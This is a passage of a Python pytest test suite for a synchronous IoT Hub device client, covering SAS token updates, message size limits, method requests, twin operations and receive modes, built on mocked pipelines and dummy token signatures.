x509_client._mqtt_pipeline.pipeline_configuration.sastoken = None
x509_client._mqtt_pipeline.pipeline_configuration.x509 = mocker.MagicMock()
with pytest.raises(client_exceptions.ClientError):
x509_client.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the client was created with a renewable, non-user provided SAS (e.g. from connection string, symmetric key, etc.)"
)
def test_created_with_renewable_sas(self, mocker, uri, sas_client, new_sas_token_string):
# Modify client to seem as if created with renewable SAS
mock_signing_mechanism = mocker.MagicMock()
mock_signing_mechanism.sign.return_value = "ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI="
renewable_token = st.RenewableSasToken(uri, mock_signing_mechanism)
sas_client._mqtt_pipeline.pipeline_configuration.sastoken = renewable_token
# Client fails
with pytest.raises(client_exceptions.ClientError):
sas_client.update_sastoken(new_sas_token_string)
@pytest.mark.it("Raises a ValueError if there is an error creating a new NonRenewableSasToken")
def test_token_error(self, mocker, sas_client, new_sas_token_string):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st.NonRenewableSasToken, "__init__")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
sas_client.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, uri, sas_client, hostname, device_id):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it(
"Raises ValueError if the provided SAS token string does not match the previous SAS details"
)
def test_nonmatching_uri_in_new_token(self, sas_client, nonmatching_uri):
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
sastoken_str = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(nonmatching_uri, safe=""),
signature=urllib.parse.quote(signature),
expiry=int(time.time()) + 3600,
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
def test_raises_value_error_invalid_uri(self, mocker, sas_client, invalid_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' MQTTPipeline operation")
def test_calls_pipeline_send_message(self, client, mqtt_pipeline, message):
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
assert mqtt_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, mqtt_pipeline, message_input
):
client.send_message(message_input)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_data_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia" * 25600
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_size_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 25600
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_data_equal_to_256(self, client, mqtt_pipeline):
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get") # patch this receive_method_request won't block
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Method Requests will appear disabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.METHODS
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox._put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(
self, mocker, client, mqtt_pipeline, method_name, block, timeout
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, mqtt_pipeline, method_response):
client.send_method_response(method_response)
assert mqtt_pipeline.send_method_response.call_count == 1
assert mqtt_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, mqtt_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(mqtt_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, mqtt_pipeline):
client.get_twin()
assert mqtt_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, twin_patch_reported
):
# patch this so x_get_twin won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
mqtt_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, mqtt_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.patch_twin_reported_properties.call_count == 1
assert (
mqtt_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin patches will appear disabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN_PATCHES
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox._put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubDeviceClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the MQTTPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_c2d_message_received is not None
assert (
client._mqtt_pipeline.on_c2d_message_received == client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubDeviceClientCreateFromSastoken(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSastokenTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSymmetricKeyTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .update_sastoken()")
class TestIoTHubDeviceClientUpdateSasToken(
